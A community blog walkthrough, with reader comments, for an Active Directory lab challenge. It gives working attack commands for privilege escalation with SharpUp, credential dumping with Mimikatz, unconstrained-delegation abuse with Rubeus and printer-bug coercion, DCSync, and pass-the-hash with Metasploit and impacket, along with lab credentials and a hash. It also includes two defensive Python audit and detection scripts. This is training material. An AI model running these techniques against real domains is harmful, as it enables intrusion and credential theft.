Community Blog

Human Connection Challenge: Season 1 – Active Directory Official Walkthrough Guide (Community Version)

StefanApostol
3 days ago

Time’s Up! Congratulations to everyone who completed Lab 7: Active Directory from the Human Connection Challenge: Season 1.

In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine!

This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed.

This walkthrough uses placeholders for target IPs in brackets, such as <Kali IP>. Simply replace this with the actual IP of your Kali instance or the specific target.

Let's get started!

Task 1

What is the WS01 token in C:\Users\Administrator\Desktop\token.txt?

The credentials panel gives you the following username and password combination for host WS01.

offensive\jack.s:!nitialPass33.

Use the following command to log in to WS01:

xfreerdp /v:<WS01 IP> /u:jack.s /d:offensive +clipboard +drives /drive:home,/home/kali /dynamic-resolution

The task asks you for the token in C:\Users\Administrator\Desktop, so your first job is to escalate your privileges, since jack.s is only a low-privileged user. For this, you can transfer SharpUp.exe, found in /home/kali/Desktop/tools, to WS01. Run all of its privilege escalation checks with the following command:

SharpUp audit

This gives you the credentials OffensiveAdmin:It'sBlankAnyway. You can now use the following command to RDP to WS01 as OffensiveAdmin:

xfreerdp /v:<WS01 IP> /u:OffensiveAdmin +clipboard +drives /drive:home,/home/kali /dynamic-resolution

With admin privileges, you can now read the token in C:\Users\Administrator\Desktop\token.txt.

Task 2

What is the SRV01 token in C:\Users\tina.m\Desktop\token.txt?

It's clear from the task that you must get access to the user tina.m, who can connect to SRV01. With your new administrator privileges on WS01, open Task Manager to check for other users' sessions.

You’ll see that tina.m has a cmd.exe process running. This means you can now attempt to get their hash or password from memory using Mimikatz.

mimikatz.exe 
privilege::debug 
sekurlsa::logonpasswords

Using the credentials offensive\tina.m:PwdDump1ng1241, you can now log in to SRV01 and get your second token.

Task 3

What is the DC token in C:\Users\Administrator\Desktop\token.txt?

The last task asks you to connect to the DC, which means you need to become a domain administrator.

Use PowerView-Dev.ps1 to enumerate the most common attack paths to Domain Admin. One of them is unconstrained delegation.

. .\PowerView-Dev.ps1 
Get-DomainComputer -Unconstrained -Properties dnshostname

SRV01 turns out to be trusted for unconstrained delegation, so any TGT sent to it by another principal is cached on that host. Since you have administrator privileges on SRV01, you can capture DC01's ticket-granting ticket (TGT).
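Seen from the defensive side, the finding above is what an unconstrained-delegation audit should surface. The following is an added example, not part of the walkthrough or of PowerView: it runs over constructed dicts shaped like the LDAP attributes PowerView reads (the privileged field is a stand-in for a group-membership lookup) and reports the non-DC hosts with the flag set together with the admins whose TGTs such a host could still capture.

```python
"""Audit unconstrained delegation from the defender's side (added example).
Runs on constructed dicts shaped like the LDAP attributes PowerView reads; the
'privileged' field is a stand-in for a group-membership lookup, not a live query.
"""
# userAccountControl bit flags (MS-ADTS).
SERVER_TRUST_ACCOUNT = 0x2000     # set on domain controller machine accounts
TRUSTED_FOR_DELEGATION = 0x80000  # unconstrained delegation (PowerView -Unconstrained)
NOT_DELEGATED = 0x100000          # "Account is sensitive and cannot be delegated"


def delegation_kind(computer):
    """Classify a computer object's Kerberos delegation configuration."""
    if computer["userAccountControl"] & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if computer.get("msDS-AllowedToDelegateTo"):
        return "constrained"
    return "none"


def audit(computers, users, protected_users):
    """Report non-DC unconstrained hosts and the admins whose TGTs they could capture.
    DCs are unconstrained by design, so only member servers and workstations count.
    An admin is exposed unless NOT_DELEGATED is set or they are in Protected Users;
    both stop the KDC from handing that host a forwardable TGT for the account."""
    risky_hosts = [c["dNSHostName"] for c in computers
                   if delegation_kind(c) == "unconstrained"
                   and not c["userAccountControl"] & SERVER_TRUST_ACCOUNT]
    exposed_admins = [u["sAMAccountName"] for u in users
                      if risky_hosts and u["privileged"]
                      and not u["userAccountControl"] & NOT_DELEGATED
                      and u["sAMAccountName"] not in protected_users]
    return {"risky_hosts": risky_hosts, "exposed_admins": exposed_admins}


# Constructed sample directory loosely modelled on the lab hosts.
COMPUTERS = [
    {"dNSHostName": "dc01.offensive.local", "userAccountControl": 0x82000},   # DC: expected
    {"dNSHostName": "srv01.offensive.local", "userAccountControl": 0x81000},  # member server: finding
    {"dNSHostName": "ws01.offensive.local", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["cifs/srv01.offensive.local"]},             # constrained only
]
USERS = [
    {"sAMAccountName": "administrator", "userAccountControl": 0x200, "privileged": True},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x100200, "privileged": True},
    {"sAMAccountName": "jack.s", "userAccountControl": 0x200, "privileged": False},
]

if __name__ == "__main__":
    print(audit(COMPUTERS, USERS, protected_users={"svc_backup"}))
```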

First, transfer Rubeus.exe, and MS-RPRN.exe over to SRV01. Then, run Rubeus and monitor for tickets.

Rubeus.exe monitor /interval:1

Then, force DC01 to make an SMB connection to SRV01 so that Rubeus captures its ticket.

.\MS-RPRN.exe \\dc01.offensive.local \\srv01.offensive.local

Rubeus prints the captured TGT as base64 split across several lines. Save it to ticket.txt on Kali and strip the spaces and newlines so it can be supplied as a single argument:

sed -i "s/ //g" ticket.txt
tr -d "\n" < ticket.txt

Then, on SRV01, run the following command to pass it.

Rubeus.exe ptt /ticket:<formatted base64 encoded ticket>

If you did all that correctly, running the command klist would reveal the Kerberos ticket for the machine account DC01$.

Now, transfer mimikatz.exe and run the following command:

mimikatz.exe 
lsadump::dcsync /user:administrator

This will give you the hash 2c9299e44ee3abcf5c6f9e7938123334. You can now use Metasploit to connect to the DC, as follows:

sudo msfconsole 
use exploit/windows/smb/psexec 
set smbuser administrator 
set smbpass aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334 
set rhosts <DC IP> 
exploit

Finally, you can drop into a shell and read the token at C:\Users\Administrator\Desktop\token.txt.
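Seen from the DC's side, the lsadump::dcsync step above is a directory replication request and shows up in the Security log as Event 4662 carrying the replication extended rights. The script below is an added detection example, not part of the walkthrough or of any tool it names: it runs over constructed event dicts, and the DC account names and addresses are placeholders you would fill in from your own inventory.

```python
"""Flag DCSync-style replication requests in Security log records (added example).
Events are constructed, trimmed dicts, not real log output; DC names and
addresses are placeholders standing in for the lab's DC01 and SRV01."""
import re

# Extended-right GUIDs a DCSync must request (MS-ADTS).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
DC_ACCOUNTS = {"DC01$"}      # machine accounts that replicate legitimately
DC_ADDRESSES = {"10.0.0.1"}  # constructed placeholder address for DC01
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)


def dcsync_alerts(events):
    """Return (logon_id, subject, reason) for each suspicious Event 4662.

    A non-DC principal requesting replication rights is flagged, and so is a DC
    account whose session (Event 4624, matched on Logon ID) came from a non-DC
    address: that is how the walkthrough's DCSync under DC01$'s stolen TGT looks.
    """
    source_by_logon = {e["TargetLogonId"]: e["IpAddress"]
                       for e in events if e["EventID"] == 4624}
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = {g.lower() for g in GUID_RE.findall(e.get("Properties", ""))}
        if not rights & REPLICATION_RIGHTS:
            continue  # ordinary directory access, not replication
        subject, logon = e["SubjectUserName"], e["SubjectLogonId"]
        src = source_by_logon.get(logon)
        if subject.upper() not in DC_ACCOUNTS:
            alerts.append((logon, subject, "replication rights requested by non-DC principal"))
        elif src is not None and src not in DC_ADDRESSES:
            alerts.append((logon, subject, f"DC account replicating from non-DC address {src}"))
    return alerts


# Constructed sample records (only the fields the check needs).
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetLogonId": "0x3e7", "IpAddress": "10.0.0.1"},     # DC01 itself
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x3e7",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},                # normal replication
    {"EventID": 4624, "TargetLogonId": "0x5a1c2", "IpAddress": "10.0.0.20"},  # session from SRV01
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x5a1c2",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "tina.m", "SubjectLogonId": "0x77ab",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},                # user asks directly
]
```

Running dcsync_alerts(SAMPLE_EVENTS) flags the second DC01$ session and the tina.m request while passing the genuine DC-to-DC replication.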

Tools

For this challenge, you’ll use a range of tools including:

  • SharpUp
  • PowerView
  • Rubeus
  • MS-RPRN
  • Metasploit

Tips

When testing for web application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they neglect to handle inputs securely. So make sure you check all user input forms and any buttons or links that direct you to different parts of the application.

To learn more about some of the tools used in this lab, take a look at the following collections:

  • Windows Basics
  • Privilege Escalation: Windows
  • Introduction to Metasploit
  • Introduction to Active Directory Attacks
  • Kerberos

Conclusion

The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done!

If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below!

I hope you enjoyed the challenge!

Updated 3 days ago
Version 2.0

6 Comments

  • Was a nice lab. I struggled quite a bit because I got a golden ticket (pass-the-hash) but wasn't able to access \\DC\c$

    But then I changed to another strategy and instead of psexec I used:

    impacket-wmiexec -dc-ip <DC ip> -target-ip <DC ip> administrator@<DC ip> -hashes aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334

    Maybe to explain why the hash has 'aad3b435b51404eeaad3b435b51404ee' added:
    Most newer Windows versions do not store passwords in LM format by default, and the string aad3b435b51404eeaad3b435b51404ee, called the null LM hash, signifies that it is empty. So we need to add it.

    • StefanApostol (Immerser)

      Hi! Glad you liked it. Also, for impacket tools, you don't need to add the empty LM hash, you can simply use :2c9299e44ee3abcf5c6f9e7938123334 (notice the ":" is still there)

  • Xat (Bronze III)

    Wait a minute! I just had to retry the lab again to make sure I wasn't going crazy. On step 1 my 'OffensiveAdmin' password was expired:

    $ xfreerdp /v:10.102.57.161 /u:OffensiveAdmin /p:"It'sBlankAnyway" /cert-ignore +clipboard

    [19:30:32:656] [56154:56155] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_PASSWORD_EXPIRED [0x0002000E]

    I had to find another "hack" to bypass this and log in to RDP with an expired password.

    Did I break something? Or did StefanApostol give me a personal extra challenge?

    • steven (Silver II)

      https://arstechnica.com/security/2025/04/windows-rdp-lets-you-log-in-using-revoked-passwords-microsoft-is-ok-with-that/

      I was able to just RDP into it:

      xfreerdp /v:10.102.191.140 /u:'OffensiveAdmin'  /dynamic-resolution /cert-ignore +clipboard +drives /drive:root,/home/kali

      (and then filling in the pwd)

      • Xat (Bronze III)

        It works for me now too (I should have been clearer). I had to get the above error from my logs. No idea what I did wrong back then (it was a fun extra challenge).